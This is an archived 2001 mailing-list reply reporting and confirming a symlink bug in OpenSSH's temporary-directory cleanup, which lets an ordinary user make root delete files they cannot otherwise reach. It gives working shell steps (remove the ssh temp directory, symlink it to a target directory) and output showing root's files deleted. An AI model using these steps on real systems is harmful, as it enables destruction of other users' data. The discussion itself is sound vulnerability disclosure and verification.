[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: SSH allows deletion of other users files...



On Mon, Jun 04, 2001 at 04:03:51PM -0500, Leonard Leblanc wrote:
>  >  [root@clarity /root]# touch /cookies;ls /cookies
> > >  /cookies
> > >  [root@clarity /root]# ssh zen@localhost
> > >  zen@localhost's password:
> > >  [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
> > >  [zen@clarity zen]$ logout
> >
> > >  [root@clarity /root]# ls /cookies
> > >  /bin/ls: /cookies: No such file or directory
> >
> > I could not duplicate this with OpenSSH 2.9p1-1 on Red Hat 6.2
> >
> 
> I could not duplicate this with OpenSSH-1.2.3, protocol version 1.5 on a
> Debian box.
hmm... it appers to work on my system too...
alm:~$ id
uid=1000(alson) gid=1001(friends) groups=1001(friends)
alm:~$ su -
Password: 
alm:~# mkdir /root/secret
alm:~# chmod 700 /root/secret
alm:~# chmod 600 /root/secret/cookies
alm:~# ls -l /root/secret/
total 0
-rw-------    1 root     root            0 Jun  5 00:04 cookies
alm:~# logout
alm:~$ ssh localhost
alson@localhost's password: 
alm:~$ rm -rf /tmp/ssh-XXoadRxj 
alm:~$ ln -s /root/secret /tmp/ssh-XXoadRxj
alm:~$ exit
Connection to localhost closed.
alm:~$ su -
Password: 
alm:~# ls -la /root/secret
total 3
drwx------    2 root     root         1024 Jun  5 00:07 .
drwx------   33 root     root         2048 Jun  5 00:04 ..
alm:~# sshd -V
sshd: option requires an argument -- V
sshd version OpenSSH_2.5.2p2
Usage: sshd [options]
...
alm:~# logout
alm:~$ ssh -V
OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090601f

BTW: I use the ssh2 protocol by default, so it's used here too

Don't call your important files cookies ;)
-- 
,-------------------------------------------.
> Name:           Alson van der Meulen      <
> Personal:       alson@linuxfreak.nl       <
> School:       alson@gymnasiumleiden.nl    <
`-------------------------------------------'
Do you smell something?
---------------------------------------------



Reply to: